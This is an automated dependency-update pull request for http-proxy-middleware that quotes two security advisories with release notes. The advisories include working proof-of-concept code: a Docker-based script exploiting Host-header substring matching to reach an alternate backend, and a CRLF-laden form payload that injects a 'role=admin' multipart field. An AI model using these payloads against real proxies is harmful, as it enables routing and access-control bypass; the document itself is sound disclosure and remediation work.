chore(deps): update dependency http-proxy-middleware to v3.0.7 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
http-proxy-middleware	3.0.5 → 3.0.7

---

http-proxy-middleware router host+path substring matching allows Host-header-driven backend routing bypass

CVE-2026-55602 / GHSA-64mm-vxmg-q3vj

More information

Details

Summary

http-proxy-middleware documents router proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted Host header that is only a superstring match for a configured host+path key can still route a request to an unintended backend.

Details

Tested code state:

• validated on tag v4.0.0-beta.5
• corresponding commit: 339f09ede860197807d4fd99ed9020fa5d0bd358

Relevant code locations:

• src/router.ts
• src/http-proxy-middleware.ts

Affected public API:

• createProxyMiddleware({ router: { 'host/path': 'http://target' } })

Code explanation:

When a proxy-table router key contains /, getTargetFromProxyTable() concatenates attacker-controlled req.headers.host and req.url into a single hostAndPath string, then accepts the route if:

hostAndPath.indexOf(key) > -1

That is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is:

localhost:3000/api

but the attacker-controlled host is:

evillocalhost:3000

and the request path is:

/api

The concatenated attacker-controlled string:

evillocalhost:3000/api

still contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host.

Exploit path:

1. the application enables the documented proxy-table router feature with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted Host header
3. HttpProxyMiddleware.prepareProxyRequest() applies router selection before proxying
4. getTargetFromProxyTable() accepts the crafted Host + path string through substring matching
5. the request is proxied to the wrong backend

PoC

Create these files in the same working directory and run:

bash ./run.sh

File: run.sh

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs

File: Dockerfile

FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/

RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction

File: verify.mjs

import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';

import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}

This PoC starts:

• one default backend returning DEFAULT
• one alternate backend returning SECRET
• one proxy using:

createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

It then sends:

1. a baseline request to /api with Host: safe.example:3000
2. a crafted request to /api with Host: evillocalhost:3000

Observed result from the validated PoC:

• baseline request: STEP baseline-route body=DEFAULT
• crafted request: STEP crafted-route body=SECRET
• success marker: RESULT reproduced host_header_injection router substring match bypass

The PoC is considered successful only if:

1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host

Impact

This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted Host header.

Severity

• CVSS Score: 6.9 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj
• https://github.com/advisories/GHSA-64mm-vxmg-q3vj

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in fixRequestBody

CVE-2026-55603 / GHSA-gcq2-9pq2-cxqm

More information

Details

Summary

fixRequestBody() is the library's documented helper for re-emitting a request body that was already consumed by a body parser. When the outgoing Content-Type is multipart/form-data, it rebuilds the body with handlerFormDataBodyData(), which interpolates each req.body key and value directly into the multipart wire format without neutralizing CR/LF:

// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
}

A \r\n inside a value (or key) lets an attacker close the current part and inject an entirely new form part. Because the proxy's own body parser saw a single opaque value, any gateway-side policy or validation performed on req.body is evaluated against a different set of fields than the upstream backend ultimately parses a request/parameter desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: application/json uses JSON.stringify (escapes control chars) and application/x-www-form-urlencoded uses querystring.stringify (percent-encodes). Only the multipart branch lacks escaping.

Preconditions

All three must hold; this narrows real-world exposure and is the basis for AC:H:

1. The proxy app populates req.body with a non-multipart parser (express.urlencoded, express.json, or text) so an injected boundary in a value is not split on input.
2. The proxied (outgoing) request is sent as multipart/form-data (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs.
3. The app calls fixRequestBody (the documented pattern for "I body-parsed, now re-stream"), and an attacker controls at least one body field value or key.

Note: a pure multipart-in → multipart-out flow (e.g. multer) is generally not exploitable for a new-field injection, because the proxy's multipart parser already splits the injected boundary, so req.body and the backend agree. The desync specifically requires a non-multipart input parser.

Impact

When the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend:

• Validation / access-control bypass bypass gateway-side field checks (demonstrated below: a gateway that forbids role=admin is bypassed; backend grants admin).
• Parameter tampering add or overwrite fields the backend trusts (IDs, flags, prices).
• File-part injection inject a filename="..." part into the upstream multipart stream.

Proof of Concept

// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req);          // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());

Output: one input field becomes two parts; role=admin was injected via the unescaped CRLF:

--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"     <-- injected part; never present in req.body's keys
admin
--BB--

req.body had a single key (user), so any gateway policy checking req.body.role passes, yet the backend's multipart parser receives role=admin. On the wire the attacker simply sends, as application/x-www-form-urlencoded: user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--

Remediation

Neutralize CR/LF (and ") in keys/values before interpolation, or build the body with a real multipart encoder (e.g. FormData / form-data) instead of string concatenation. Minimal fix:

function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
}

(Reject is preferable to silent stripping, to avoid masking malicious input.)

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N

References

• https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm
• https://github.com/advisories/GHSA-gcq2-9pq2-cxqm

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

chimurai/http-proxy-middleware (http-proxy-middleware)

v3.0.7

Compare Source

What's Changed

• fix(fixRequestBody): harden form-data stringification by @​chimurai in #​1259
• chore(package.json): v3.0.7 by @​chimurai in #​1261

Full Changelog: chimurai/http-proxy-middleware@v3.0.6...v3.0.7

v3.0.6

Compare Source

What's Changed

• fix(types): fix Logger type by @​chimurai in #​1104
• fix(fixRequestBody): support text/plain by @​knudtty in #​1103
• chore(examples): bump deps by @​chimurai in #​1105
• build(prettier): improve prettier setup by @​chimurai in #​1108
• chore(deps): fix punycode node deprecation warning by @​chimurai in #​1109
• chore(examples): bump deps by @​chimurai in #​1110
• build(codespaces): add devcontainer.json by @​chimurai in #​1112
• chore(package): bump dev dependencies by @​chimurai in #​1116
• ci(github-action): ci.yml add node v24 by @​chimurai in #​1117
• chore(package): bump dev dependencies by @​chimurai in #​1118
• chore(package): upgrade to jest v30 by @​chimurai in #​1122
• chore(examples): upgrade deps by @​chimurai in #​1124
• chore(package): update dev deps by @​chimurai in #​1125
• test(websocket): fix ws import by @​chimurai in #​1126
• chore(refactor): use node: protocol imports by @​chimurai in #​1127
• ci(node24): pin node24 due to TLS issue with mockttp by @​chimurai in #​1137
• docs(recipes/pathRewrite.md): fix comment by @​DEBargha2004 in #​1135
• chore(package): bump dev deps by @​chimurai in #​1138
• chore(deps): update actions/checkout action to v5 by @​chimurai in #​1140
• fix(error-response-plugin): sanitize input by @​chimurai in #​1141
• chore(package.json): update dev deps by @​chimurai in #​1143
• chore: add context7.json by @​chimurai in #​1144
• build(eslint): update eslint.config.mjs by @​chimurai in #​1145
• ci(github workflow): harden github workflows by @​chimurai in #​1146
• chore(package): bump dev deps by @​chimurai in #​1147
• ci(ci.yml): unpin node 24 by @​chimurai in #​1148
• docs(recipes): fix servers.md http.createServer example by @​hacklschorsch in #​1150
• ci: publish with oidc by @​chimurai in #​1152
• chore(package.json): bump dev deps by @​chimurai in #​1153
• chore(package.json): bump dev deps by @​chimurai in #​1155
• chore(package.json): bump dev deps by @​chimurai in #​1158
• test(types.spec.ts): add type check when req or res are 'any' by @​chimurai in #​1161
• chore(package.json): bump deps by @​chimurai in #​1164
• chore(package.json): eslint v10 by @​chimurai in #​1165
• chore(package.json): bump dev deps by @​chimurai in #​1166
• chore(package.json): bump dev-deps by @​chimurai in #​1171
• docs(examples): fix websocket example by @​chimurai in #​1170
• build(vscode): use workspace version of TypeScript by @​chimurai in #​1173
• fix(router): harden proxy-table matching by @​chimurai in #​1254
• chore(package.json): v3.0.6 by @​chimurai in #​1256

New Contributors

• @​knudtty made their first contribution in #​1103
• @​DEBargha2004 made their first contribution in #​1135
• @​hacklschorsch made their first contribution in #​1150

Full Changelog: chimurai/http-proxy-middleware@v3.0.5...v3.0.6

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[github-actions]

📊 Benchmark results

Comparing with 5585c33

• Dependency count: 1,127 (no change)
• Package size: 379 MB ⬆️ 0.01% increase vs. 5585c33
• Number of ts-expect-error directives: 352 (no change)